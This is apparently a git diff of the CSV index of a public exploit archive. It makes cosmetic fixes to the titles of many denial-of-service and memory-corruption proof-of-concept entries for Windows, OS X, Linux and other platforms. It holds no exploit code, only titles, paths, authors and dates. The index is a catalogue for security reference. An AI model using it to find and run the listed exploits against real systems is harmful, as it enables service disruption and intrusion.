diff --git a/files.csv b/files.csv index 74dc93179..1ed7e2ed2 100644 --- a/files.csv +++ b/files.csv @@ -467,7 +467,7 @@ id,file,description,date,author,platform,type,port 3098,platforms/osx/dos/3098.html,"OmniWeb 5.5.1 - JavaScript alert() Remote Format String (PoC)",2007-01-07,MoAB,osx,dos,0 3101,platforms/multiple/dos/3101.py,"Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption Vulnerabilities",2007-01-08,posidron,multiple,dos,0 3110,platforms/osx/dos/3110.rb,"Apple Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)",2007-01-09,MoAB,osx,dos,0 -3111,platforms/windows/dos/3111.pl,"Microsoft Windows - Explorer (.WMF) CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos,0 +3111,platforms/windows/dos/3111.pl,"Microsoft Windows Explorer - '.WMF' CreateBrushIndirect Denial of Service",2007-01-13,cyanid-E,windows,dos,0 3112,platforms/windows/dos/3112.py,"eIQnetworks Network Security Analyzer - Null Pointer Dereference Exploit",2007-01-10,"Ethan Hunt",windows,dos,0 3119,platforms/windows/dos/3119.py,"VideoLAN VLC Media Player 0.8.6a - Unspecified Denial of Service (1)",2007-01-12,shinnai,windows,dos,0 3126,platforms/windows/dos/3126.c,"WFTPD Pro Server 3.25 - Site ADMN Remote Denial of Service",2007-01-14,Marsu,windows,dos,0 @@ -484,7 +484,7 @@ id,file,description,date,author,platform,type,port 3166,platforms/osx/dos/3166.html,"Apple iChat 3.1.6 441 - 'aim://' URL Handler Format String (PoC)",2007-01-21,MoAB,osx,dos,0 3167,platforms/osx/dos/3167.c,"Apple Mac OSX 10.4.x Kernel - shared_region_map_file_np() Memory Corruption",2007-01-21,"Adriano Lima",osx,dos,0 3182,platforms/windows/dos/3182.py,"Sami HTTP Server 2.0.1 - HTTP 404 Object not found Denial of Service",2007-01-23,shinnai,windows,dos,0 -3190,platforms/windows/dos/3190.py,"Microsoft Windows - Explorer (.AVI) Unspecified Denial of Service",2007-01-24,shinnai,windows,dos,0 +3190,platforms/windows/dos/3190.py,"Microsoft Windows Explorer - '.AVI' Unspecified Denial of Service",2007-01-24,shinnai,windows,dos,0 3193,platforms/windows/dos/3193.py,"Microsoft Excel - Malformed Palette Record Denial of Service (PoC) (MS07-002)",2007-01-25,LifeAsaGeek,windows,dos,0 3200,platforms/osx/dos/3200.rb,"Apple CFNetwork - HTTP Response Denial of Service (Ruby)",2007-01-25,MoAB,osx,dos,0 3204,platforms/windows/dos/3204.c,"Citrix Metaframe Presentation Server Print Provider - Buffer Overflow (PoC)",2007-01-26,"Andres Tarasco",windows,dos,0 @@ -540,7 +540,7 @@ id,file,description,date,author,platform,type,port 3602,platforms/windows/dos/3602.py,"IBM Lotus Domino Server 6.5 - 'Username' Remote Denial of Service",2007-03-29,"Winny Thomas",windows,dos,0 3606,platforms/multiple/dos/3606.py,"Mozilla Firefox 2.0.0.3 - / Gran Paradiso 3.0a3 Denial of Service Hang / Crash",2007-03-29,shinnai,multiple,dos,0 3674,platforms/windows/dos/3674.pl,"Wserve HTTP Server 4.6 - (Long Directory Name) Denial of Service",2007-04-05,WiLdBoY,windows,dos,0 -3684,platforms/windows/dos/3684.c,"Microsoft Windows - Explorer Unspecified .ANI File Denial of Service",2007-04-08,Marsu,windows,dos,0 +3684,platforms/windows/dos/3684.c,"Microsoft Windows Explorer - Unspecified '.ANI' File Denial of Service",2007-04-08,Marsu,windows,dos,0 3690,platforms/windows/dos/3690.txt,"Microsoft Word 2007 - Multiple Vulnerabilities",2007-04-09,muts,windows,dos,0 3693,platforms/windows/dos/3693.txt,"Microsoft Windows - '.hlp' Local HEAP Overflow (PoC)",2007-04-09,muts,windows,dos,0 3709,platforms/multiple/dos/3709.html,"Gran Paradiso 3.0a3 - Non-Existent applet Denial of Service",2007-04-11,shinnai,multiple,dos,0 @@ -612,7 +612,7 @@ id,file,description,date,author,platform,type,port 4181,platforms/multiple/dos/4181.php,"PHP 5.2.3 - glob() Denial of Service",2007-07-14,shinnai,multiple,dos,0 4196,platforms/multiple/dos/4196.c,"Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service",2007-07-18,fbffff,multiple,dos,0 4205,platforms/windows/dos/4205.pl,"TeamSpeak 2.0 - (Windows Release) Remote Denial of Service",2007-07-20,"YAG KOHHA",windows,dos,0 -4215,platforms/windows/dos/4215.pl,"Microsoft Windows - explorer.exe Gif Image Denial of Service",2007-07-23,DeltahackingTEAM,windows,dos,0 +4215,platforms/windows/dos/4215.pl,"Microsoft Windows Explorer - '.GIF' Image Denial of Service",2007-07-23,DeltahackingTEAM,windows,dos,0 4216,platforms/linux/dos/4216.pl,"Xserver 0.1 Alpha - Post Request Remote Buffer Overflow",2007-07-23,deusconstruct,linux,dos,0 4227,platforms/windows/dos/4227.php,"PHP 5.2.3 - 'PHP_gd2.dll' imagepsloadfont Local Buffer Overflow (PoC)",2007-07-26,r0ut3r,windows,dos,0 4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash",2007-07-31,tenkei_ev,multiple,dos,0 @@ -659,7 +659,7 @@ id,file,description,date,author,platform,type,port 4615,platforms/multiple/dos/4615.txt,"MySQL 5.0.45 - (Alter) Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0 4624,platforms/osx/dos/4624.c,"Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)",2007-11-16,"RISE Security",osx,dos,0 4648,platforms/multiple/dos/4648.py,"Apple QuickTime 7.2/7.3 - RTSP Response Remote Overwrite (SEH)",2007-11-23,h07,multiple,dos,0 -4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - AIFF Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0 +4682,platforms/windows/dos/4682.c,"Microsoft Windows Media Player - '.AIFF' Divide By Zero Exception Denial of Service (PoC)",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0 4683,platforms/windows/dos/4683.py,"RealPlayer 11 - '.au' Denial of Service",2007-12-01,NtWaK0,windows,dos,0 4688,platforms/windows/dos/4688.html,"VideoLAN VLC Media Player 0.86 < 0.86d - ActiveX Remote Bad Pointer Initialization",2007-12-04,"Ricardo Narvaja",windows,dos,0 4689,platforms/osx/dos/4689.c,"Apple Mac OSX xnu 1228.0 - mach-o Local Kernel Denial of Service (PoC)",2007-12-04,mu-b,osx,dos,0 @@ -714,7 +714,7 @@ id,file,description,date,author,platform,type,port 5307,platforms/linux/dos/5307.pl,"MPlayer 1.0 rc2 - 'sdpplin_parse()' Array Indexing Buffer Overflow (PoC)",2008-03-25,"Guido Landi",linux,dos,0 5316,platforms/windows/dos/5316.py,"PacketTrap Networks pt360 2.0.39 TFTPD - Remote Denial of Service",2008-03-26,muts,windows,dos,0 5321,platforms/windows/dos/5321.txt,"Visual Basic - 'vbe6.dll' Local Stack Overflow (PoC) / Denial of Service",2008-03-30,Marsu,windows,dos,0 -5327,platforms/windows/dos/5327.txt,"Microsoft Windows - Explorer Unspecified .doc File Denial of Service",2008-03-31,"Iron Team",windows,dos,0 +5327,platforms/windows/dos/5327.txt,"Microsoft Windows Explorer - Unspecified '.doc' File Denial of Service",2008-03-31,"Iron Team",windows,dos,0 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service",2008-04-01,Ray,windows,dos,0 5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service",2008-04-02,muts,windows,dos,0 5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service",2008-04-02,muts,windows,dos,0 @@ -804,7 +804,7 @@ id,file,description,date,author,platform,type,port 6565,platforms/windows/dos/6565.txt,"K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer Denial of Service (PoC)",2008-09-25,Aodrulez,windows,dos,0 6581,platforms/windows/dos/6581.pl,"WinFTP Server 2.3.0 - 'NLST' Denial of Service",2008-09-26,"Julien Bedard",windows,dos,0 6582,platforms/hardware/dos/6582.pl,"Microsoft Windows Mobile 6.0 - Device long name Remote Reboot Exploit",2008-09-26,"Julien Bedard",hardware,dos,0 -6588,platforms/windows/dos/6588.txt,"Microsoft Windows - GDI+ '.ico' Remote Division By Zero Exploit",2008-09-26,"laurent gaffié",windows,dos,0 +6588,platforms/windows/dos/6588.txt,"Microsoft Windows - GDI+ '.ICO' Remote Division By Zero Exploit",2008-09-26,"laurent gaffié",windows,dos,0 6609,platforms/windows/dos/6609.html,"Google Chrome 0.2.149.30 - Window Object Suppressing Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0 6614,platforms/windows/dos/6614.html,"Mozilla Firefox 3.0.3 - User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",windows,dos,0 6615,platforms/windows/dos/6615.html,"Opera 9.52 - Window Object Suppressing Remote Denial of Service",2008-09-28,"Aditya K Sood",windows,dos,0 @@ -870,7 +870,7 @@ id,file,description,date,author,platform,type,port 7314,platforms/windows/dos/7314.txt,"Maxum Rumpus 6.0 - Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",windows,dos,0 7330,platforms/multiple/dos/7330.c,"ClamAV < 0.94.2 - JPEG Parsing Recursive Stack Overflow (PoC)",2008-12-03,"ilja van sprundel",multiple,dos,0 7358,platforms/windows/dos/7358.html,"Visagesoft eXPert PDF EditorX - 'VSPDFEditorX.ocx' Insecure Method",2008-12-05,"Marco Torti",windows,dos,0 -7362,platforms/windows/dos/7362.py,"DesignWorks Professional 4.3.1 - Local .CCT File Stack Buffer Overflow (PoC)",2008-12-06,Cnaph,windows,dos,0 +7362,platforms/windows/dos/7362.py,"DesignWorks Professional 4.3.1 - Local '.CCT' File Stack Buffer Overflow (PoC)",2008-12-06,Cnaph,windows,dos,0 7387,platforms/windows/dos/7387.py,"Neostrada Livebox Router - Remote Network Down (PoC)",2008-12-08,0in,windows,dos,0 7401,platforms/windows/dos/7401.txt,"Vinagre < 2.24.2 - show_error() Remote Format String (PoC)",2008-12-09,"Core Security",windows,dos,0 7405,platforms/linux/dos/7405.c,"Linux Kernel 2.6.27.8 - ATMSVC Local Denial of Service",2008-12-10,"Jon Oberheide",linux,dos,0 @@ -2218,7 +2218,7 @@ id,file,description,date,author,platform,type,port 18958,platforms/windows/dos/18958.html,"Sony VAIO Wireless Manager 4.0.0.0 - Buffer Overflows",2012-05-31,"High-Tech Bridge SA",windows,dos,0 18962,platforms/windows/dos/18962.py,"Sorensoft Power Media 6.0 - Denial of Service",2012-05-31,Onying,windows,dos,0 18964,platforms/windows/dos/18964.txt,"IrfanView 4.33 - Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0 -18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn .TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 +18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 - Format PlugIn '.TTF' File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service",2012-06-06,Onying,windows,dos,0 19034,platforms/windows/dos/19034.cpp,"PEamp - '.mp3' Memory Corruption (PoC)",2012-06-10,Ayrbyte,windows,dos,0 19041,platforms/aix/dos/19041.txt,"Digital Ultrix 4.0/4.1 - /usr/bin/chroot Exploit",1991-05-01,anonymous,aix,dos,0 @@ -2360,7 +2360,7 @@ id,file,description,date,author,platform,type,port 19817,platforms/ultrix/dos/19817.txt,"Data General DG/UX 5.4 - inetd Service Exhaustion Denial of Service",2000-03-16,"The Unicorn",ultrix,dos,0 19818,platforms/linux/dos/19818.c,"Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service",2000-03-23,"Jay Fenlason",linux,dos,0 19820,platforms/windows/dos/19820.txt,"AnalogX SimpleServer:WWW 1.0.3 - Denial of Service",2000-03-25,"Presto Chango",windows,dos,0 -19827,platforms/windows/dos/19827.txt,"Microsoft Windows NT 4/2000 - TCP/IP Printing Service Denial of Service",2000-03-30,"Ussr Labs",windows,dos,0 +19827,platforms/windows/dos/19827.txt,"Microsoft Windows NT 4.0/2000 - TCP/IP Printing Service Denial of Service",2000-03-30,"Ussr Labs",windows,dos,0 19963,platforms/windows/dos/19963.txt,"PHP 6.0 - openssl_verify() Local Buffer Overflow (PoC)",2012-07-20,"Yakir Wizman",windows,dos,0 19834,platforms/windows/dos/19834.txt,"Real Networks RealPlayer 6/7 - Location Buffer Overflow",2000-04-03,"Adam Muntner",windows,dos,0 19835,platforms/windows/dos/19835.txt,"SalesLogix Corporation eViewer 1.0 - Denial of Service",2000-03-31,"Todd Beebe",windows,dos,0 @@ -2438,7 +2438,7 @@ id,file,description,date,author,platform,type,port 20233,platforms/windows/dos/20233.txt,"NetcPlus BrowseGate 2.80 - Denial of Service",2000-09-21,"Delphis Consulting",windows,dos,0 20239,platforms/multiple/dos/20239.txt,"HP OpenView Network Node Manager 6.10 - SNMP Denial of Service",2000-09-26,DCIST,multiple,dos,0 20254,platforms/windows/dos/20254.txt,"Microsoft Windows NT 4.0 - Invalid LPC Request Denial of Service (MS00-070)",2000-10-03,"BindView's Razor Team",windows,dos,0 -20255,platforms/windows/dos/20255.txt,"Microsoft Windows NT 4.0 / 2000 - LPC Zone Memory Depletion Denial of Service",2000-10-03,"BindView's Razor Team",windows,dos,0 +20255,platforms/windows/dos/20255.txt,"Microsoft Windows NT 4.0/2000 - LPC Zone Memory Depletion Denial of Service",2000-10-03,"BindView's Razor Team",windows,dos,0 20271,platforms/openbsd/dos/20271.c,"OpenBSD 2.x - Pending ARP Request Remote Denial of Service",2000-10-05,skyper,openbsd,dos,0 20272,platforms/windows/dos/20272.pl,"Apache 1.2.5/1.3.1 / UnityMail 2.0 - MIME Header Denial of Service",1998-08-02,L.Facq,windows,dos,0 20282,platforms/windows/dos/20282.pl,"Evolvable Shambala Server 4.5 - Denial of Service",2000-10-09,zillion,windows,dos,0 @@ -2575,7 +2575,7 @@ id,file,description,date,author,platform,type,port 21099,platforms/windows/dos/21099.c,"Microsoft Windows Server 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,windows,dos,0 21103,platforms/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 - IP Fragment Denial of Service",2000-05-23,phonix,hardware,dos,0 21122,platforms/linux/dos/21122.sh,"Linux Kernel 2.2 / 2.4 - Deep Symbolic Link Denial of Service",2001-10-18,Nergal,linux,dos,0 -21123,platforms/windows/dos/21123.txt,"Microsoft Windows NT / 2000 - Terminal Server Service RDP Denial of Service",2001-10-18,"Luciano Martins",windows,dos,0 +21123,platforms/windows/dos/21123.txt,"Microsoft Windows NT/2000 - Terminal Server Service RDP Denial of Service",2001-10-18,"Luciano Martins",windows,dos,0 21126,platforms/multiple/dos/21126.c,"6Tunnel 0.6/0.7/0.8 - Connection Close State Denial of Service",2001-10-23,awayzzz,multiple,dos,0 21131,platforms/windows/dos/21131.txt,"Microsoft Windows XP/2000 - GDI Denial of Service",2001-10-29,PeterB,windows,dos,0 21147,platforms/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",windows,dos,0 @@ -2601,8 +2601,8 @@ id,file,description,date,author,platform,type,port 21236,platforms/unix/dos/21236.txt,"DNRD 1.x/2.x - DNS Request/Reply Denial of Service",2002-01-20,"Andrew Griffiths",unix,dos,0 21237,platforms/windows/dos/21237.pl,"Cyberstop Web Server 0.1 - Long Request Denial of Service",2002-01-22,"Alex Hernandez",windows,dos,0 21240,platforms/windows/dos/21240.txt,"Microsoft Windows XP - '.Manifest' Denial of Service",2002-01-21,mosestycoon,windows,dos,0 -21245,platforms/windows/dos/21245.c,"Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (1)",2001-04-13,3APA3A,windows,dos,0 -21246,platforms/windows/dos/21246.c,"Microsoft Windows NT 4/2000 - TCP Stack Denial of Service (2)",2001-04-13,3APA3A,windows,dos,0 +21245,platforms/windows/dos/21245.c,"Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (1)",2001-04-13,3APA3A,windows,dos,0 +21246,platforms/windows/dos/21246.c,"Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (2)",2001-04-13,3APA3A,windows,dos,0 21261,platforms/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service",2002-01-31,"Luca Papotti",unix,dos,0 21262,platforms/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service",2002-02-02,"Rafael San Miguel Carrasco",linux,dos,0 21275,platforms/osx/dos/21275.c,"ICQ For Mac OSX 2.6 Client - Denial of Service",2002-02-05,Stephen,osx,dos,0 @@ -2680,8 +2680,8 @@ id,file,description,date,author,platform,type,port 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server - ActiveX Control Array Indexing",2012-10-04,"Francis Provencher",windows,dos,0 21739,platforms/windows/dos/21739.pl,"JPEGsnoop 1.5.2 - WriteAV Crash (PoC)",2012-10-04,"Jean Pascal Pereira",windows,dos,0 21741,platforms/windows/dos/21741.txt,"XnView 1.99.1 - '.JLS' File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",windows,dos,0 -21746,platforms/windows/dos/21746.c,"Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0 -21747,platforms/windows/dos/21747.txt,"Microsoft Windows XP/2000/NT 4 - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0 +21746,platforms/windows/dos/21746.c,"Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",windows,dos,0 +21747,platforms/windows/dos/21747.txt,"Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,windows,dos,0 21756,platforms/hardware/dos/21756.txt,"Belkin F5D6130 Wireless Network Access Point - SNMP Request Denial of Service",2002-08-26,wlanman,hardware,dos,0 21770,platforms/hardware/dos/21770.c,"Cisco VPN 3000 Series Concentrator Client - Authentication Denial of Service",2002-09-03,Phenoelit,hardware,dos,0 21775,platforms/linux/dos/21775.c,"SWS Simple Web Server 0.0.3/0.0.4/0.1 - New Line Denial of Service",2002-09-02,saman,linux,dos,0 @@ -2713,10 +2713,10 @@ id,file,description,date,author,platform,type,port 21941,platforms/windows/dos/21941.txt,"Polycom 2.2/3.0 - ViaVideo Buffer Overflow",2002-10-15,prophecy.net.nz,windows,dos,0 21943,platforms/windows/dos/21943.c,"Zone Labs ZoneAlarm 3.0/3.1 - Syn Flood Denial of Service",2002-10-16,"Abraham Lincoln",windows,dos,0 21949,platforms/unix/dos/21949.txt,"IBM Websphere Caching Proxy 3.6/4.0 - Denial of Service",2002-10-18,Rapid7,unix,dos,0 -21951,platforms/windows/dos/21951.c,"Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (1)",2002-10-22,lion,windows,dos,0 -21952,platforms/windows/dos/21952.c,"Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (2)",2002-10-22,Trancer,windows,dos,0 -21953,platforms/windows/dos/21953.txt,"Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (3)",2002-10-18,Rapid7,windows,dos,0 -21954,platforms/windows/dos/21954.txt,"Microsoft Windows XP/2000/NT 4 - RPC Service Denial of Service (4)",2002-10-18,anonymous,windows,dos,0 +21951,platforms/windows/dos/21951.c,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (1)",2002-10-22,lion,windows,dos,0 +21952,platforms/windows/dos/21952.c,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (2)",2002-10-22,Trancer,windows,dos,0 +21953,platforms/windows/dos/21953.txt,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (3)",2002-10-18,Rapid7,windows,dos,0 +21954,platforms/windows/dos/21954.txt,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (4)",2002-10-18,anonymous,windows,dos,0 21963,platforms/windows/dos/21963.pl,"SolarWinds TFTP Server Standard Edition 5.0.55 - Large UDP Packet",2002-10-24,D4rkGr3y,windows,dos,0 21965,platforms/windows/dos/21965.txt,"Alt-N MDaemon 6.0.x - POP Server Buffer Overflow",2002-10-28,D4rkGr3y,windows,dos,0 21971,platforms/hardware/dos/21971.txt,"Cisco AS5350 - Universal Gateway Portscan Denial of Service",2002-10-28,"Thomas Munn",hardware,dos,0 @@ -2780,7 +2780,7 @@ id,file,description,date,author,platform,type,port 22245,platforms/windows/dos/22245.txt,"Microsoft Windows NT/2000 - cmd.exe CD Buffer Overflow",2003-02-11,3APA3A,windows,dos,0 22249,platforms/aix/dos/22249.txt,"IBM AIX 4.3.3/5.1/5.2 libIM - Buffer Overflow",2003-02-12,"Euan Briggs",aix,dos,0 22250,platforms/multiple/dos/22250.sh,"iParty Conferencing Server - Denial of Service",1999-05-08,wh00t,multiple,dos,0 -22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4 - 'Riched20.dll' Attribute Buffer Overflow",2003-02-17,"Jie Dong",windows,dos,0 +22255,platforms/windows/dos/22255.txt,"Microsoft Windows XP/95/98/2000/NT 4.0 - 'Riched20.dll' Attribute Buffer Overflow",2003-02-17,"Jie Dong",windows,dos,0 22258,platforms/windows/dos/22258.txt,"Aladdin Knowledge System Ltd. PrivAgent ActiveX Control 2.0 - Multiple Vulnerabilities",2012-10-26,shinnai,windows,dos,0 22259,platforms/linux/dos/22259.c,"BitchX 1.0 - Malformed RPL_NAMREPLY Denial of Service",2003-01-30,argv,linux,dos,0 22273,platforms/linux/dos/22273.c,"Zlib 1.1.4 - Compression Library gzprintf() Buffer Overrun (1)",2003-02-23,"Richard Kettlewel",linux,dos,0 @@ -3147,7 +3147,7 @@ id,file,description,date,author,platform,type,port 24023,platforms/hardware/dos/24023.py,"Colloquy 1.3.5 / 1.3.6 - Denial of Service",2013-01-10,UberLame,hardware,dos,0 24029,platforms/windows/dos/24029.pl,"RhinoSoft Serv-U FTP Server 3.x/4.x/5.0 - LIST Parameter Buffer Overflow",2004-04-20,storm,windows,dos,0 24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 - 'YInsthelper.dll' Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0 -24051,platforms/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4 - Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",windows,dos,0 +24051,platforms/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4.0 - Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",windows,dos,0 24066,platforms/multiple/dos/24066.txt,"DiGi WWW Server 1 - Remote Denial of Service",2004-04-27,"Donato Ferrante",multiple,dos,0 24070,platforms/multiple/dos/24070.txt,"Rosiello Security Sphiro HTTPD 0.1B - Remote Heap Buffer Overflow",2004-04-30,"Slotto Corleone",multiple,dos,0 24078,platforms/linux/dos/24078.c,"PaX 2.6 Kernel Patch - Denial of Service",2004-05-03,Shadowinteger,linux,dos,0 @@ -3688,7 +3688,7 @@ id,file,description,date,author,platform,type,port 29229,platforms/windows/dos/29229.txt,"Microsoft Internet Explorer 6 - Frame Src Denial of Service",2006-12-05,"Juan Pablo Lopez",windows,dos,0 29236,platforms/windows/dos/29236.html,"Microsoft Internet Explorer 7 - CSS Width Element Denial of Service",2006-12-06,xiam.core,windows,dos,0 29285,platforms/windows/dos/29285.txt,"Microsoft Windows Media Player 6.4/10.0 - MID Malformed Header Chunk Denial of Service",2006-12-15,shinnai,windows,dos,0 -29286,platforms/windows/dos/29286.txt,"Microsoft Windows Explorer - 'explorer.exe' .WMV File Handling Denial of Service",2006-12-15,shinnai,windows,dos,0 +29286,platforms/windows/dos/29286.txt,"Microsoft Windows Explorer - 'explorer.exe' '.WMV' File Handling Denial of Service",2006-12-15,shinnai,windows,dos,0 29287,platforms/windows/dos/29287.txt,"Multiple Vendor Firewall - HIPS Process Spoofing",2006-12-15,"Matousec Transparent security",windows,dos,0 29295,platforms/windows/dos/29295.html,"Microsoft Outlook - ActiveX Control Remote Internet Explorer Denial of Service",2006-12-18,shinnai,windows,dos,0 29296,platforms/linux/dos/29296.txt,"KDE LibkHTML 4.2 - NodeType Function Denial of Service",2006-12-19,"Federico L. Bossi Bonin",linux,dos,0 @@ -3733,8 +3733,8 @@ id,file,description,date,author,platform,type,port 29683,platforms/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service",2007-02-27,"Steve Grubb",linux,dos,0 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (Denial of Service)",2013-11-12,"Necmettin COSKUN",windows,dos,0 29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0 -29551,platforms/osx/dos/29551.txt,"Apple Mac OSX 10.4.x - iMovie HD .imovieproj Filename Format String",2007-01-30,LMH,osx,dos,0 -29553,platforms/osx/dos/29553.txt,"Apple Mac OSX 10.4.x - Help Viewer .help Filename Format String",2007-01-30,LMH,osx,dos,0 +29551,platforms/osx/dos/29551.txt,"Apple Mac OSX 10.4.x - iMovie HD '.imovieproj' Filename Format String",2007-01-30,LMH,osx,dos,0 +29553,platforms/osx/dos/29553.txt,"Apple Mac OSX 10.4.x - Help Viewer '.help' Filename Format String",2007-01-30,LMH,osx,dos,0 29554,platforms/osx/dos/29554.txt,"Apple Mac OSX 10.4.x - iPhoto 'photo://' URL Handling Format String",2007-01-30,LMH,osx,dos,0 29555,platforms/osx/dos/29555.txt,"Apple Mac OSX 10.4.x - Safari window.console.log Format String",2007-01-30,LMH,osx,dos,0 29558,platforms/windows/dos/29558.c,"Comodo Firewall 2.3.6 - 'CMDMon.SYS' Multiple Denial of Service Vulnerabilities",2007-02-01,"Matousec Transparent security",windows,dos,0 @@ -3747,7 +3747,7 @@ id,file,description,date,author,platform,type,port 29620,platforms/osx/dos/29620.txt,"Apple Mac OSX 10.4.8 - ImageIO GIF Image Integer Overflow",2007-02-20,"Tom Ferris",osx,dos,0 29671,platforms/windows/dos/29671.txt,"Avira Secure Backup 1.0.0.1 Build 3616 - '.reg' Buffer Overflow",2013-11-18,"Julien Ahrens",windows,dos,0 29791,platforms/windows/dos/29791.pl,"Boilsoft RM TO MP3 Converter 1.72 - '.wav' Crash (PoC)",2013-11-23,"Akin Tosunlar",windows,dos,0 -29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 - Explorer .WMF File Handling Denial of Service",2007-02-25,sehato,windows,dos,0 +29659,platforms/windows/dos/29659.pl,"Microsoft Windows XP/2003 - Explorer '.WMF' File Handling Denial of Service",2007-02-25,sehato,windows,dos,0 29660,platforms/windows/dos/29660.txt,"Microsoft Office 2003 - Denial of Service",2007-02-25,sehato,windows,dos,0 29664,platforms/windows/dos/29664.txt,"Microsoft Publisher 2007 - Remote Denial of Service",2007-02-26,"Tom Ferris",windows,dos,0 30187,platforms/multiple/dos/30187.txt,"Mbedthis AppWeb 2.2.2 - URL Protocol Format String",2007-06-12,"Nir Rachmel",multiple,dos,0 @@ -4839,7 +4839,7 @@ id,file,description,date,author,platform,type,port 38789,platforms/windows/dos/38789.txt,"Oracle Outside In PDF 8.5.2 - Parsing Memory Corruption (2)",2015-11-23,"Francis Provencher",windows,dos,0 38791,platforms/windows/dos/38791.rb,"Audacious 3.7 - ID3 Local Crash (PoC)",2015-11-23,"Antonio Z.",windows,dos,0 38793,platforms/windows/dos/38793.txt,"Microsoft Windows - 'ndis.sys' IOCTL 0x170034 (ndis!ndisNsiGetIfNameForIfIndex) - Pool Buffer Overflow (MS15-117)",2015-11-23,"Nils Sommer",windows,dos,0 -38794,platforms/windows/dos/38794.txt,"Microsoft Windows Cursor - Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 +38794,platforms/windows/dos/38794.txt,"Microsoft Windows - Cursor Object Potential Memory Leak (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38795,platforms/windows/dos/38795.txt,"Microsoft Windows - Race Condition DestroySMWP Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38796,platforms/windows/dos/38796.txt,"Microsoft Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)",2015-11-23,"Nils Sommer",windows,dos,0 38798,platforms/multiple/dos/38798.txt,"Mozilla Firefox - Cookie Verification Denial of Service",2013-04-04,anonymous,multiple,dos,0 @@ -4885,7 +4885,7 @@ id,file,description,date,author,platform,type,port 39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0 40105,platforms/multiple/dos/40105.txt,"Adobe Flash Player 22.0.0.192 - TAG Memory Corruption",2016-07-13,COSIG,multiple,dos,0 40104,platforms/multiple/dos/40104.txt,"Adobe Flash Player 22.0.0.192 - SceneAndFrameData Memory Corruption",2016-07-13,COSIG,multiple,dos,0 -39025,platforms/windows/dos/39025.txt,"Microsoft Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0 +39025,platforms/windows/dos/39025.txt,"Microsoft Windows Kernel - win32k!OffsetChildren Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0 